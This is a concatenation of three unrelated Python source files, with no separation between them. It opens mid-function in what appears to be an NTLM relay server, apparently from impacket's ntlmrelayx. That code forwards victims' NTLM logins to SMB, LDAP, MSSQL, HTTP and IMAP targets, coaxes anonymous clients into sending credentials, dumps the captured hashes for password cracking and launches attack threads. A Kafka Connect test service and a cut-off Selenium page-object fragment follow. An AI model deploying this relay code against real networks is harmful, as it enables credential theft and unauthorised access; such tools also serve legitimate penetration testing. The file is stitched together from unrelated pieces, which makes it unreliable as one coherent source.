                    # Dump the captured hash in John-the-Ripper format.
                    ntlm_hash_data = outputToJohnFormat(connData['CHALLENGE_MESSAGE']['challenge'],
                                                        authenticateMessage['user_name'],
                                                        authenticateMessage['domain_name'],
                                                        authenticateMessage['lanman'], authenticateMessage['ntlm'])
                    logging.info(ntlm_hash_data['hash_string'])
                    if self.server.getJTRdumpPath() != '':
                        writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
                                              self.server.getJTRdumpPath())
                    del (smbData[self.target])
                    self.do_attack(client)
                    # Now continue with the server
                    #############################################################

                    respToken = SPNEGO_NegTokenResp()
                    # accept-completed
                    respToken['NegResult'] = '\x00'
                    # Status SUCCESS
                    errorCode = STATUS_SUCCESS
                    # Let's store it in the connection data
                    connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
            else:
                raise Exception("Unknown NTLMSSP MessageType %d" % messageType)

            respParameters['SecurityBlobLength'] = len(respToken)
            respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
            respData['SecurityBlob'] = respToken.getData()

        else:
            # Process Standard Security
            # TODO: Fix this for other protocols than SMB [!]
            respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
            respData = smb.SMBSessionSetupAndXResponse_Data()
            sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters'])
            sessionSetupData = smb.SMBSessionSetupAndX_Data()
            sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
            sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
            sessionSetupData.fromString(SMBCommand['Data'])
            connData['Capabilities'] = sessionSetupParameters['Capabilities']
            #############################################################
            # SMBRelay
            smbClient = smbData[self.target]['SMBClient']
            if sessionSetupData['Account'] != '':
                # TODO: Fix this for other protocols than SMB [!]
                clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'],
                                                                     sessionSetupData['PrimaryDomain'],
                                                                     sessionSetupData['AnsiPwd'],
                                                                     sessionSetupData['UnicodePwd'])
            else:
                # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials
                errorCode = STATUS_ACCESS_DENIED

            if errorCode != STATUS_SUCCESS:
                # Let's return what the target returned, hope the client connects back again
                packet = smb.NewSMBPacket()
                packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
                packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_EXTENDED_SECURITY
                packet['Command'] = recvPacket['Command']
                packet['Pid'] = recvPacket['Pid']
                packet['Tid'] = recvPacket['Tid']
                packet['Mid'] = recvPacket['Mid']
                packet['Uid'] = recvPacket['Uid']
                packet['Data'] = '\x00\x00\x00'
                packet['ErrorCode'] = errorCode >> 16
                packet['ErrorClass'] = errorCode & 0xff
                # Reset the UID
                smbClient.setUid(0)
                # Log this target as processed for this client
                self.targetprocessor.log_target(connData['ClientIP'], self.target)
                return None, [packet], errorCode
                # Now continue with the server
            else:
                # We have a session, create a thread and do whatever we want
                ntlm_hash_data = outputToJohnFormat('', sessionSetupData['Account'],
                                                    sessionSetupData['PrimaryDomain'],
                                                    sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
                logging.info(ntlm_hash_data['hash_string'])
                if self.server.getJTRdumpPath() != '':
                    writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
                                          self.server.getJTRdumpPath())
                # TODO: Fix this for other protocols than SMB [!]
                clientThread = self.config.attacks['SMB'](self.config, smbClient, self.config.exeFile,
                                                          self.config.command)
                clientThread.start()
                # Log this target as processed for this client
                self.targetprocessor.log_target(connData['ClientIP'], self.target)

                # Remove the target server from our connection list, the work is done
                del (smbData[self.target])
                # Now continue with the server
            #############################################################

        # Do the verification here, for just now we grant access
        # TODO: Manage more UIDs for the same session
        errorCode = STATUS_SUCCESS
        connData['Uid'] = 10
        respParameters['Action'] = 0

        respData['NativeOS'] = smbServer.getServerOS()
        respData['NativeLanMan'] = smbServer.getServerOS()
        respSMBCommand['Parameters'] = respParameters
        respSMBCommand['Data'] = respData

        # From now on, the client can ask for other commands
        connData['Authenticated'] = True
        #############################################################
        # SMBRelay
        smbServer.setConnectionData('SMBRelay', smbData)
        #############################################################
        smbServer.setConnectionData(connId, connData)

        return [respSMBCommand], None, errorCode

    # Initialize the correct client for the relay target
    def init_client(self, extSec):
        """
        Instantiate the relay client matching the current target protocol.
        `extSec` enables extended security for the SMB client.
        """
        if self.target[0] == 'SMB':
            client = SMBRelayClient(self.target[1], extended_security=extSec)
            client.setDomainAccount(self.config.machineAccount, self.config.machineHashes, self.config.domainIp)
            client.set_timeout(60)
        if self.target[0] == 'MSSQL':
            client = MSSQLRelayClient(self.target[1], self.target[2])
        if self.target[0] == 'LDAP' or self.target[0] == 'LDAPS':
            client = LDAPRelayClient("%s://%s:%d" % (self.target[0].lower(), self.target[1], self.target[2]))
        if self.target[0] == 'HTTP' or self.target[0] == 'HTTPS':
            client = HTTPRelayClient(
                "%s://%s:%d/%s" % (self.target[0].lower(), self.target[1], self.target[2], self.target[3]))
        if self.target[0] == 'IMAP' or self.target[0] == 'IMAPS':
            client = IMAPRelayClient("%s://%s:%d" % (self.target[0].lower(), self.target[1], self.target[2]))
        return client

    # Do the NTLM negotiate
    def do_ntlm_negotiate(self, client, token):
        """
        Forward the NTLM NEGOTIATE token to the target and return the parsed
        NTLMAuthChallenge the target answers with.
        """
        # Since the clients all support the same operations there is no target protocol specific code needed for now
        if 'LDAP' in self.target[0]:
            # Remove the message signing flag
            # For LDAP this is required otherwise it triggers LDAP signing
            negotiateMessage = ntlm.NTLMAuthNegotiate()
            negotiateMessage.fromString(token)
            # negotiateMessage['flags'] ^= ntlm.NTLMSSP_NEGOTIATE_SIGN
            clientChallengeMessage = client.sendNegotiate(negotiateMessage.getData())
        else:
            clientChallengeMessage = client.sendNegotiate(token)
        challengeMessage = ntlm.NTLMAuthChallenge()
        challengeMessage.fromString(clientChallengeMessage)
        return challengeMessage

    # Do NTLM auth
    def do_ntlm_auth(self, client, SPNEGO_token, authenticateMessage):
        """
        Forward the victim's AUTHENTICATE token to the target and translate
        the per-protocol result into (clientResponse, NT status code).
        """
        # The NTLM blob is packed in a SPNEGO packet, extract it for methods other than SMB
        respToken2 = SPNEGO_NegTokenResp(SPNEGO_token)
        token = respToken2['ResponseToken']
        clientResponse = None
        if self.target[0] == 'SMB':
            clientResponse, errorCode = client.sendAuth(SPNEGO_token, authenticateMessage)
        if self.target[0] == 'MSSQL':
            # This client needs a proper response code
            try:
                result = client.sendAuth(token)
                if result:  # This contains a boolean
                    errorCode = STATUS_SUCCESS
                else:
                    errorCode = STATUS_ACCESS_DENIED
            except Exception, e:
                logging.error("NTLM Message type 3 against %s FAILED" % self.target[1])
                logging.error(str(e))
                errorCode = STATUS_ACCESS_DENIED
        if self.target[0] == 'LDAP' or self.target[0] == 'LDAPS':
            # This client needs a proper response code
            try:
                result = client.sendAuth(token)  # Result dict
                if result['result'] == 0 and result['description'] == 'success':
                    errorCode = STATUS_SUCCESS
                else:
                    logging.error("LDAP bind against %s as %s FAILED" % (self.target[1], self.authUser))
                    logging.error('Error: %s. Message: %s' % (result['description'], str(result['message'])))
                    errorCode = STATUS_ACCESS_DENIED
                    # NOTE(review): leftover debug print statement — confirm
                    # whether it should be removed or turned into logging.
                    print errorCode
                # Failed example:
                # {'dn': u'', 'saslCreds': None, 'referrals': None, 'description': 'invalidCredentials', 'result': 49, 'message': u'8009030C: LdapErr: DSID-0C0905FE, comment: AcceptSecurityContext error, data 52e, v23f0\x00', 'type': 'bindResponse'}
                # Ok example:
                # {'dn': u'', 'saslCreds': None, 'referrals': None, 'description': 'success', 'result': 0, 'message': u'', 'type': 'bindResponse'}
            except Exception, e:
                logging.error("NTLM Message type 3 against %s FAILED" % self.target[1])
                logging.error(str(e))
                errorCode = STATUS_ACCESS_DENIED
        if self.target[0] == 'HTTP' or self.target[0] == 'HTTPS':
            try:
                result = client.sendAuth(token)  # Result is a boolean
                if result:
                    errorCode = STATUS_SUCCESS
                else:
                    logging.error("HTTP NTLM auth against %s as %s FAILED" % (self.target[1], self.authUser))
                    errorCode = STATUS_ACCESS_DENIED
            except Exception, e:
                logging.error("NTLM Message type 3 against %s FAILED" % self.target[1])
                logging.error(str(e))
                errorCode = STATUS_ACCESS_DENIED
        if self.target[0] == 'IMAP' or self.target[0] == 'IMAPS':
            try:
                result = client.sendAuth(token)  # Result is a boolean
                if result:
                    errorCode = STATUS_SUCCESS
                else:
                    logging.error("IMAP NTLM auth against %s as %s FAILED" % (self.target[1], self.authUser))
                    errorCode = STATUS_ACCESS_DENIED
            except Exception, e:
                logging.error("IMAP NTLM Message type 3 against %s FAILED" % self.target[1])
                logging.error(str(e))
                errorCode = STATUS_ACCESS_DENIED
        return clientResponse, errorCode

    def do_attack(self, client):
        """
        Launch the configured attack thread for the authenticated session.
        """
        # Do attack. Note that unlike the HTTP server, the config entries are
        # stored in the current object and not in any of its properties
        if self.target[0] == 'SMB':
            clientThread = self.config.attacks['SMB'](self.config, client, self.authUser)
            clientThread.start()
        if self.target[0] == 'LDAP' or self.target[0] == 'LDAPS':
            clientThread = self.config.attacks['LDAP'](self.config, client, self.authUser)
            clientThread.start()
        if self.target[0] == 'HTTP' or self.target[0] == 'HTTPS':
            clientThread = self.config.attacks['HTTP'](self.config, client, self.authUser)
            clientThread.start()
        if self.target[0] == 'MSSQL':
            clientThread = self.config.attacks['MSSQL'](self.config, client)
            clientThread.start()
        if self.target[0] == 'IMAP' or self.target[0] == 'IMAPS':
            clientThread = self.config.attacks['IMAP'](self.config, client, self.authUser)
            clientThread.start()

    def _start(self):
        # Blocks serving SMB connections forever.
        self.server.serve_forever()

    def run(self):
        """Thread entry point: start serving."""
        logging.info("Setting up SMB Server")
        self._start()
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import json
import os.path
import random
import signal
import time

import requests
from ducktape.errors import DucktapeError
from ducktape.services.service import Service
from ducktape.utils.util import wait_until

from kafkatest.directory_layout.kafka_path import KafkaPathResolverMixin
from kafkatest.services.kafka.util import fix_opts_for_new_jvm


class ConnectServiceBase(KafkaPathResolverMixin, Service):
    """Base class for Kafka Connect services providing some common settings and functionality"""

    PERSISTENT_ROOT = "/mnt/connect"
    CONFIG_FILE = os.path.join(PERSISTENT_ROOT, "connect.properties")
    # The log file contains normal log4j logs written using a file appender. stdout and stderr are handled separately
    # so they can be used for other output, e.g. verifiable source & sink.
    LOG_FILE = os.path.join(PERSISTENT_ROOT, "connect.log")
    STDOUT_FILE = os.path.join(PERSISTENT_ROOT, "connect.stdout")
    STDERR_FILE = os.path.join(PERSISTENT_ROOT, "connect.stderr")
    LOG4J_CONFIG_FILE = os.path.join(PERSISTENT_ROOT, "connect-log4j.properties")
    PID_FILE = os.path.join(PERSISTENT_ROOT, "connect.pid")
    EXTERNAL_CONFIGS_FILE = os.path.join(PERSISTENT_ROOT, "connect-external-configs.properties")
    CONNECT_REST_PORT = 8083
    HEAP_DUMP_FILE = os.path.join(PERSISTENT_ROOT, "connect_heap_dump.bin")

    # Currently the Connect worker supports waiting on three modes:
    STARTUP_MODE_INSTANT = 'INSTANT'
    """STARTUP_MODE_INSTANT: Start Connect worker and return immediately"""
    STARTUP_MODE_LOAD = 'LOAD'
    """STARTUP_MODE_LOAD: Start Connect worker and return after discovering and loading plugins"""
    STARTUP_MODE_LISTEN = 'LISTEN'
    """STARTUP_MODE_LISTEN: Start Connect worker and return after opening the REST port."""

    logs = {
        "connect_log": {
            "path": LOG_FILE,
            "collect_default": True},
        "connect_stdout": {
            "path": STDOUT_FILE,
            "collect_default": False},
        "connect_stderr": {
            "path": STDERR_FILE,
            "collect_default": True},
        "connect_heap_dump_file": {
            "path": HEAP_DUMP_FILE,
            "collect_default": True}
    }

    def __init__(self, context, num_nodes, kafka, files, startup_timeout_sec=60):
        super(ConnectServiceBase, self).__init__(context, num_nodes)
        self.kafka = kafka
        self.security_config = kafka.security_config.client_config()
        self.files = files
        # Default to waiting for the REST port; tests override via start(mode=...).
        self.startup_mode = self.STARTUP_MODE_LISTEN
        self.startup_timeout_sec = startup_timeout_sec
        self.environment = {}
        self.external_config_template_func = None

    def pids(self, node):
        """Return process ids for Kafka Connect processes."""
        try:
            return [pid for pid in node.account.ssh_capture("cat " + self.PID_FILE, callback=int)]
        # NOTE(review): bare except deliberately treats any failure (e.g.
        # missing PID file) as "no processes" — confirm this best-effort
        # behavior is intended before narrowing it.
        except:
            return []

    def set_configs(self, config_template_func, connector_config_templates=None):
        """
        Set configurations for the worker and the connector to run on
        it. These are not provided in the constructor because the worker
        config generally needs access to ZK/Kafka services to create the
        configuration.
        """
        self.config_template_func = config_template_func
        self.connector_config_templates = connector_config_templates

    def set_external_configs(self, external_config_template_func):
        """
        Set the properties that will be written in the external file properties
        as used by the org.apache.kafka.common.config.provider.FileConfigProvider.
        When this is used, the worker configuration must also enable the
        FileConfigProvider. This is not provided in the constructor in case
        the worker config generally needs access to ZK/Kafka services to
        create the configuration.
        """
        self.external_config_template_func = external_config_template_func

    def listening(self, node):
        """Return True once the worker's REST API answers on `node`."""
        try:
            self.list_connectors(node)
            self.logger.debug("Connect worker started serving REST at: '%s:%s')",
                              node.account.hostname, self.CONNECT_REST_PORT)
            return True
        except requests.exceptions.ConnectionError:
            self.logger.debug("REST resources are not loaded yet")
            return False

    def start(self, mode=STARTUP_MODE_LISTEN):
        # Record how start_node should wait, then delegate to the base Service.
        self.startup_mode = mode
        super(ConnectServiceBase, self).start()

    def start_and_return_immediately(self, node, worker_type, remote_connector_configs):
        # STARTUP_MODE_INSTANT: fire the start command without waiting.
        cmd = self.start_cmd(node, remote_connector_configs)
        self.logger.debug("Connect %s command: %s", worker_type, cmd)
        node.account.ssh(cmd)

    def start_and_wait_to_load_plugins(self, node, worker_type, remote_connector_configs):
        # STARTUP_MODE_LOAD: wait for the "Kafka version" log line, which the
        # worker emits after plugin discovery/loading.
        with node.account.monitor_log(self.LOG_FILE) as monitor:
            self.start_and_return_immediately(node, worker_type, remote_connector_configs)
            monitor.wait_until('Kafka version', timeout_sec=self.startup_timeout_sec,
                               err_msg="Never saw message indicating Kafka Connect finished startup on node: " +
                                       "%s in condition mode: %s" % (str(node.account), self.startup_mode))

    def start_and_wait_to_start_listening(self, node, worker_type, remote_connector_configs):
        # STARTUP_MODE_LISTEN: wait until the REST port answers.
        self.start_and_return_immediately(node, worker_type, remote_connector_configs)
        wait_until(lambda: self.listening(node), timeout_sec=self.startup_timeout_sec,
                   err_msg="Kafka Connect failed to start on node: %s in condition mode: %s" %
                           (str(node.account), self.startup_mode))

    def stop_node(self, node, clean_shutdown=True):
        """Stop the worker on `node`; SIGTERM for clean shutdown, SIGKILL otherwise."""
        self.logger.info((clean_shutdown and "Cleanly" or "Forcibly") + " stopping Kafka Connect on " + str(node.account))
        pids = self.pids(node)
        sig = signal.SIGTERM if clean_shutdown else signal.SIGKILL

        for pid in pids:
            node.account.signal(pid, sig, allow_fail=True)

        if clean_shutdown:
            for pid in pids:
                wait_until(lambda: not node.account.alive(pid), timeout_sec=self.startup_timeout_sec,
                           err_msg="Kafka Connect process on " + str(node.account) + " took too long to exit")

        node.account.ssh("rm -f " + self.PID_FILE, allow_fail=False)

    def restart(self, clean_shutdown=True):
        # We don't want to do any clean up here, just restart the process.
        for node in self.nodes:
            self.logger.info("Restarting Kafka Connect on " + str(node.account))
            self.restart_node(node, clean_shutdown)

    def restart_node(self, node, clean_shutdown=True):
        """Stop and start the worker on a single node without cleaning state."""
        self.stop_node(node, clean_shutdown)
        self.start_node(node)

    def clean_node(self, node):
        """Kill any leftover worker process and remove all of its on-disk state."""
        node.account.kill_process("connect", clean_shutdown=False, allow_fail=True)
        self.security_config.clean_node(node)
        other_files = " ".join(self.config_filenames() + self.files)
        node.account.ssh("rm -rf -- %s %s" % (ConnectServiceBase.PERSISTENT_ROOT, other_files), allow_fail=False)

    def config_filenames(self):
        # One numbered .properties file per connector config template.
        return [os.path.join(self.PERSISTENT_ROOT, "connect-connector-" + str(idx) + ".properties")
                for idx, template in enumerate(self.connector_config_templates or [])]

    def list_connectors(self, node=None, **kwargs):
        return self._rest_with_retry('/connectors', node=node, **kwargs)

    def create_connector(self, config, node=None, **kwargs):
        create_request = {
            'name': config['name'],
            'config': config
        }
        return self._rest_with_retry('/connectors', create_request, node=node, method="POST", **kwargs)

    def get_connector(self, name, node=None, **kwargs):
        return self._rest_with_retry('/connectors/' + name, node=node, **kwargs)

    def get_connector_config(self, name, node=None, **kwargs):
        return self._rest_with_retry('/connectors/' + name + '/config', node=node, **kwargs)

    def set_connector_config(self, name, config, node=None, **kwargs):
        # Unlike many other calls, a 409 when setting a connector config is expected if the connector already exists.
        # However, we also might see 409s for other reasons (e.g. rebalancing). So we still perform retries at the cost
        # of tests possibly taking longer to ultimately fail. Tests that care about this can explicitly override the
        # number of retries.
        return self._rest_with_retry('/connectors/' + name + '/config', config, node=node, method="PUT", **kwargs)

    def get_connector_tasks(self, name, node=None, **kwargs):
        return self._rest_with_retry('/connectors/' + name + '/tasks', node=node, **kwargs)

    def delete_connector(self, name, node=None, **kwargs):
        return self._rest_with_retry('/connectors/' + name, node=node, method="DELETE", **kwargs)

    def get_connector_status(self, name, node=None):
        return self._rest('/connectors/' + name + '/status', node=node)

    def restart_connector(self, name, node=None, **kwargs):
        return self._rest_with_retry('/connectors/' + name + '/restart', node=node, method="POST", **kwargs)

    def restart_task(self, connector_name, task_id, node=None):
        return self._rest('/connectors/' + connector_name + '/tasks/' + str(task_id) + '/restart', node=node, method="POST")

    def pause_connector(self, name, node=None):
        return self._rest('/connectors/' + name + '/pause', node=node, method="PUT")

    def resume_connector(self, name, node=None):
        return self._rest('/connectors/' + name + '/resume', node=node, method="PUT")

    def list_connector_plugins(self, node=None):
        return self._rest('/connector-plugins/', node=node)

    def validate_config(self, connector_type, validate_request, node=None):
        return self._rest('/connector-plugins/' + connector_type + '/config/validate', validate_request, node=node,
                          method="PUT")

    def _rest(self, path, body=None, node=None, method="GET"):
        """Single REST call against a (random, unless given) worker node."""
        if node is None:
            node = random.choice(self.nodes)

        meth = getattr(requests, method.lower())
        url = self._base_url(node) + path
        self.logger.debug("Kafka Connect REST request: %s %s %s %s", node.account.hostname, url, method, body)
        resp = meth(url, json=body)
        self.logger.debug("%s %s response: %d", url, method, resp.status_code)
        # NOTE(review): strict '>' means an exactly-400 response is NOT raised
        # as an error — presumably this should be '>= 400'; confirm intent.
        if resp.status_code > 400:
            self.logger.debug("Connect REST API error for %s: %d %s", resp.url, resp.status_code, resp.text)
            raise ConnectRestError(resp.status_code, resp.text, resp.url)

        # 202/204 carry no body, so there is nothing to JSON-decode.
        if resp.status_code == 204 or resp.status_code == 202:
            return None
        else:
            return resp.json()

    def _rest_with_retry(self, path, body=None, node=None, method="GET", retries=40, retry_backoff=.25):
        """
        Invokes a REST API with retries for errors that may occur during normal operation (notably 409 CONFLICT
        responses that can occur due to rebalancing or 404 when the connect resources are not initialized yet).
        """
        exception_to_throw = None
        for i in range(0, retries + 1):
            try:
                return self._rest(path, body, node, method)
            except ConnectRestError as e:
                exception_to_throw = e
                # Only 409 (rebalance in progress) and 404 (resources not yet
                # initialized) are retryable; anything else fails immediately.
                if e.status != 409 and e.status != 404:
                    break
                time.sleep(retry_backoff)
        raise exception_to_throw

    def _base_url(self, node):
        # REST endpoint base for a given worker node.
        return 'http://' + node.account.externally_routable_ip + ':' + str(self.CONNECT_REST_PORT)

    def append_to_environment_variable(self, envvar, value):
        """Append `value` to an already-tracked env var, keeping it quoted."""
        env_opts = self.environment[envvar]
        if env_opts is None:
            env_opts = "\"%s\"" % value
        else:
            env_opts = "\"%s %s\"" % (env_opts.strip('\"'), value)
        self.environment[envvar] = env_opts


class ConnectStandaloneService(ConnectServiceBase):
    """Runs Kafka Connect in standalone mode."""

    def __init__(self, context, kafka, files, startup_timeout_sec=60):
        super(ConnectStandaloneService, self).__init__(context, 1, kafka, files, startup_timeout_sec)

    # For convenience since this service only makes sense with a single node
    @property
    def node(self):
        return self.nodes[0]

    def start_cmd(self, node, connector_configs):
        """Build the shell command that launches connect-standalone.sh with the
        configured env vars, log4j config and connector property files."""
        cmd = "( export KAFKA_LOG4J_OPTS=\"-Dlog4j.configuration=file:%s\"; " % self.LOG4J_CONFIG_FILE
        heap_kafka_opts = "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=%s" % \
                          self.logs["connect_heap_dump_file"]["path"]
        other_kafka_opts = self.security_config.kafka_opts.strip('\"')

        cmd += fix_opts_for_new_jvm(node)
        cmd += "export KAFKA_OPTS=\"%s %s\"; " % (heap_kafka_opts, other_kafka_opts)
        for envvar in self.environment:
            cmd += "export %s=%s; " % (envvar, str(self.environment[envvar]))
        cmd += "%s %s " % (self.path.script("connect-standalone.sh", node), self.CONFIG_FILE)
        cmd += " ".join(connector_configs)
        # Background the worker; fd 3 captures its PID into PID_FILE.
        cmd += " & echo $! >&3 ) 1>> %s 2>> %s 3> %s" % (self.STDOUT_FILE, self.STDERR_FILE, self.PID_FILE)
        return cmd

    def start_node(self, node):
        """Render configs onto the node and start the worker per startup_mode."""
        node.account.ssh("mkdir -p %s" % self.PERSISTENT_ROOT, allow_fail=False)

        self.security_config.setup_node(node)
        if self.external_config_template_func:
            node.account.create_file(self.EXTERNAL_CONFIGS_FILE, self.external_config_template_func(node))
        node.account.create_file(self.CONFIG_FILE, self.config_template_func(node))
        node.account.create_file(self.LOG4J_CONFIG_FILE, self.render('connect_log4j.properties', log_file=self.LOG_FILE))
        remote_connector_configs = []
        for idx, template in enumerate(self.connector_config_templates):
            target_file = os.path.join(self.PERSISTENT_ROOT, "connect-connector-" + str(idx) + ".properties")
            node.account.create_file(target_file, template)
            remote_connector_configs.append(target_file)

        self.logger.info("Starting Kafka Connect standalone process on " + str(node.account))
        if self.startup_mode == self.STARTUP_MODE_LOAD:
            self.start_and_wait_to_load_plugins(node, 'standalone', remote_connector_configs)
        elif self.startup_mode == self.STARTUP_MODE_INSTANT:
            self.start_and_return_immediately(node, 'standalone', remote_connector_configs)
        else:
            # The default mode is to wait until the complete startup of the worker
            self.start_and_wait_to_start_listening(node, 'standalone', remote_connector_configs)

        if len(self.pids(node)) == 0:
            raise RuntimeError("No process ids recorded")


class ConnectDistributedService(ConnectServiceBase):
    """Runs Kafka Connect in distributed mode."""

    def __init__(self, context, num_nodes, kafka, files, offsets_topic="connect-offsets",
                 configs_topic="connect-configs", status_topic="connect-status", startup_timeout_sec=60):
        super(ConnectDistributedService, self).__init__(context, num_nodes, kafka, files, startup_timeout_sec)
        self.offsets_topic = offsets_topic
        self.configs_topic = configs_topic
        self.status_topic = status_topic

    # connector_configs argument is intentionally ignored in distributed service.
    def start_cmd(self, node, connector_configs):
        """Build the shell command that launches connect-distributed.sh.
        NOTE(review): unlike the standalone variant this does not call
        fix_opts_for_new_jvm(node) — confirm whether that is intentional."""
        cmd = "( export KAFKA_LOG4J_OPTS=\"-Dlog4j.configuration=file:%s\"; " % self.LOG4J_CONFIG_FILE
        heap_kafka_opts = "-XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=%s" % \
                          self.logs["connect_heap_dump_file"]["path"]
        other_kafka_opts = self.security_config.kafka_opts.strip('\"')
        cmd += "export KAFKA_OPTS=\"%s %s\"; " % (heap_kafka_opts, other_kafka_opts)
        for envvar in self.environment:
            cmd += "export %s=%s; " % (envvar, str(self.environment[envvar]))
        cmd += "%s %s " % (self.path.script("connect-distributed.sh", node), self.CONFIG_FILE)
        # Background the worker; fd 3 captures its PID into PID_FILE.
        cmd += " & echo $! >&3 ) 1>> %s 2>> %s 3> %s" % (self.STDOUT_FILE, self.STDERR_FILE, self.PID_FILE)
        return cmd

    def start_node(self, node):
        """Render configs onto the node and start the worker per startup_mode.
        Connector configs are rejected: distributed mode takes them via REST."""
        node.account.ssh("mkdir -p %s" % self.PERSISTENT_ROOT, allow_fail=False)

        self.security_config.setup_node(node)
        if self.external_config_template_func:
            node.account.create_file(self.EXTERNAL_CONFIGS_FILE, self.external_config_template_func(node))
        node.account.create_file(self.CONFIG_FILE, self.config_template_func(node))
        node.account.create_file(self.LOG4J_CONFIG_FILE, self.render('connect_log4j.properties', log_file=self.LOG_FILE))
        if self.connector_config_templates:
            raise DucktapeError("Config files are not valid in distributed mode, submit connectors via the REST API")

        self.logger.info("Starting Kafka Connect distributed process on " + str(node.account))
        if self.startup_mode == self.STARTUP_MODE_LOAD:
            self.start_and_wait_to_load_plugins(node, 'distributed', '')
        elif self.startup_mode == self.STARTUP_MODE_INSTANT:
            self.start_and_return_immediately(node, 'distributed', '')
        else:
            # The default mode is to wait until the complete startup of the worker
            self.start_and_wait_to_start_listening(node, 'distributed', '')

        if len(self.pids(node)) == 0:
            raise RuntimeError("No process ids recorded")


class ErrorTolerance(object):
    # Valid values for the connector error-tolerance setting.
    ALL = "all"
    NONE = "none"


class ConnectRestError(RuntimeError):
    # Raised by _rest when the Connect REST API returns an error status.
    # (Class continues beyond this excerpt.)
    def __init__(self, status, msg, url):
        self.status = status
        self.message = msg
self.url = url def __unicode__(self): return "Kafka Connect REST call failed: returned " + self.status + " for " + self.url + ". Response: " + self.message class VerifiableConnector(object): def messages(self): """ Collect and parse the logs from Kafka Connect nodes. Return a list containing all parsed JSON messages generated by this source. """ self.logger.info("Collecting messages from log of %s %s", type(self).__name__, self.name) records = [] for node in self.cc.nodes: for line in node.account.ssh_capture('cat ' + self.cc.STDOUT_FILE): try: data = json.loads(line) except ValueError: self.logger.debug("Ignoring unparseable line: %s", line) continue # Filter to only ones matching our name to support multiple verifiable producers if data['name'] != self.name: continue data['node'] = node records.append(data) return records def stop(self): self.logger.info("Destroying connector %s %s", type(self).__name__, self.name) self.cc.delete_connector(self.name) class VerifiableSource(VerifiableConnector): """ Helper class for running a verifiable source connector on a Kafka Connect cluster and analyzing the output. 
""" def __init__(self, cc, name="verifiable-source", tasks=1, topic="verifiable", throughput=1000): self.cc = cc self.logger = self.cc.logger self.name = name self.tasks = tasks self.topic = topic self.throughput = throughput def committed_messages(self): return filter(lambda m: 'committed' in m and m['committed'], self.messages()) def sent_messages(self): return filter(lambda m: 'committed' not in m or not m['committed'], self.messages()) def start(self): self.logger.info("Creating connector VerifiableSourceConnector %s", self.name) self.cc.create_connector({ 'name': self.name, 'connector.class': 'org.apache.kafka.connect.tools.VerifiableSourceConnector', 'tasks.max': self.tasks, 'topic': self.topic, 'throughput': self.throughput }) class VerifiableSink(VerifiableConnector): """ Helper class for running a verifiable sink connector on a Kafka Connect cluster and analyzing the output. """ def __init__(self, cc, name="verifiable-sink", tasks=1, topics=["verifiable"]): self.cc = cc self.logger = self.cc.logger self.name = name self.tasks = tasks self.topics = topics def flushed_messages(self): return filter(lambda m: 'flushed' in m and m['flushed'], self.messages()) def received_messages(self): return filter(lambda m: 'flushed' not in m or not m['flushed'], self.messages()) def start(self): self.logger.info("Creating connector VerifiableSinkConnector %s", self.name) self.cc.create_connector({ 'name': self.name, 'connector.class': 'org.apache.kafka.connect.tools.VerifiableSinkConnector', 'tasks.max': self.tasks, 'topics': ",".join(self.topics) }) class MockSink(object): def __init__(self, cc, topics, mode=None, delay_sec=10, name="mock-sink"): self.cc = cc self.logger = self.cc.logger self.name = name self.mode = mode self.delay_sec = delay_sec self.topics = topics def start(self): self.logger.info("Creating connector MockSinkConnector %s", self.name) self.cc.create_connector({ 'name': self.name, 'connector.class': 'org.apache.kafka.connect.tools.MockSinkConnector', 
'tasks.max': 1, 'topics': ",".join(self.topics), 'mock_mode': self.mode, 'delay_ms': self.delay_sec * 1000 }) class MockSource(object): def __init__(self, cc, mode=None, delay_sec=10, name="mock-source"): self.cc = cc self.logger = self.cc.logger self.name = name self.mode = mode self.delay_sec = delay_sec def start(self): self.logger.info("Creating connector MockSourceConnector %s", self.name) self.cc.create_connector({ 'name': self.name, 'connector.class': 'org.apache.kafka.connect.tools.MockSourceConnector', 'tasks.max': 1, 'mock_mode': self.mode, 'delay_ms': self.delay_sec * 1000 })
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Page object models for the info widget of the object"""

from lib import base
from lib.constants import locator
from lib.element import widget_info


class Widget(base.Widget):
  """Abstract class for all info widgets"""
  # Set by subclasses: locator namespace and dropdown-settings page object.
  _locator = None
  _dropdown_settings_cls = None

  def __init__(self, driver):
    # wait that the elements load before calling super
    self.button_settings = base.Button(
        driver, locator.BaseInfoWidget.BUTTON_SETTINGS)
    self.title = base.Label(driver, self._locator.TITLE)
    self.title_entered = base.Label(
        driver, self._locator.TITLE_ENTERED)
    super(Widget, self).__init__(driver)
    # The object id is the last path component of the widget URL.
    self.object_id = self.url.split("/")[-1]

  def press_object_settings(self):
    """Open the object settings dropdown.

    Returns:
        widget_info.DropdownSettings
    """
    self.button_settings.click()
    return self._dropdown_settings_cls(self._driver)


class DashboardInfo(Widget):
  """Model for the dashboard info widget"""
  _locator = locator.Dashboard

  def __init__(self, driver):
    super(DashboardInfo, self).__init__(driver)
    self.button_start_new_program = base.Button(
